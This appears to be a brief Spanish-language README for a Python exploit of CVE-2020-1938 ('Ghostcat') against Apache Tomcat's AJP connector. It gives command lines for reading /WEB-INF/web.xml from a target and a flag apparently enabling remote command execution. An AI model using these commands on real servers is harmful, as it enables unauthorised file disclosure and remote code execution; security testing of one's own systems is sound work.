
Exploit para CVE-2020-1938 (Ghostcat) que permite lectura de archivos y ejecución remota de comandos en servidores Apache Tomcat vulnerables a través del conector AJP.
python3 tomcat.py URL -f /WEB-INF/web.xml
ejemplo:
python3 tomcat.py 127.0.0.1 -f /WEB-INF/web.xml -p 8090
agregar --rec 1
referencia: https://www.t00ls.net/articles-55062.html